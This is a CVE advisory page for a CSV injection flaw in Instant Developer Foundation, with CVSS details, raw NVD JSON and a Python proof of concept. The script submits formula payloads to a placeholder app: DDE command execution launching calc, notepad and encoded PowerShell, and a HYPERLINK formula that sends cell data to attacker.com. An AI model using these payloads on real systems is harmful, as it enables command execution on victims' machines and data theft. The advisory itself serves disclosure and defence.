Security Vulnerability Report
中文
CVE-2025-60852 CVSS 6.5 MEDIUM

CVE-2025-60852

Published: 2025-10-23 14:15:42
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A CSV Injection vulnerability existed in Instant Developer Foundation versions prior to 25.0.9600. Applications built with affected versions of the framework did not properly sanitize user-controlled input before including it in CSV exports. This issue could lead to code execution on the system where the exported CSV file is opened.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Instant Developer Foundation < 25.0.9600

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60852 CSV Injection PoC # Affected: Instant Developer Foundation < 25.0.9600 import requests import json # Step 1: Inject malicious formula via user input field target_url = "http://target-app.com/export_form.php" # Malicious CSV formula payloads payloads = [ "=cmd|' /C calc'!A0", # Windows RCE via DDE "=HYPERLINK(\"http://attacker.com/steal?data=\"&A1)", # Data exfiltration "+cmd|' /C notepad'!A0", # Alternative RCE syntax "-1+cmd|' /C powershell -enc base64... '!A0", # PowerShell execution ] # Inject payload through vulnerable input field for payload in payloads: data = { "username": payload, "email": "[email protected]", "description": "Test input for CSV injection" } response = requests.post(target_url, data=data) print(f"Payload sent: {payload}") print(f"Response: {response.status_code}") # Step 2: Export CSV file containing malicious formula csv_export_url = "http://target-app.com/export_csv.php" csv_response = requests.get(csv_export_url) if csv_response.status_code == 200: with open("malicious_export.csv", "wb") as f: f.write(csv_response.content) print("Malicious CSV file saved: malicious_export.csv") print("Content preview:") print(csv_response.text[:500]) # Step 3: When victim opens CSV in Excel, formula executes print("\n[!] Victim must open CSV and click 'Yes' to formula warning")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60852", "sourceIdentifier": "[email protected]", "published": "2025-10-23T14:15:42.220", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A CSV Injection vulnerability existed in Instant Developer Foundation versions prior to 25.0.9600. Applications built with affected versions of the framework did not properly sanitize user-controlled input before including it in CSV exports. This issue could lead to code execution on the system where the exported CSV file is opened."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1236"}]}], "references": [{"url": "https://doc.instantdeveloper.com/eng/default.aspx?artid=a6c69034-d1ee-4057-b19d-40505151ec8e&lang=eng", "source": "[email protected]"}, {"url": "https://github.com/valeriocassoni/CSV-Injection-in-Instant-Developer-Foundation-25.0-PoC", "source": "[email protected]"}, {"url": "https://instantdeveloper.com/lp/cloud-freelance/index.html", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.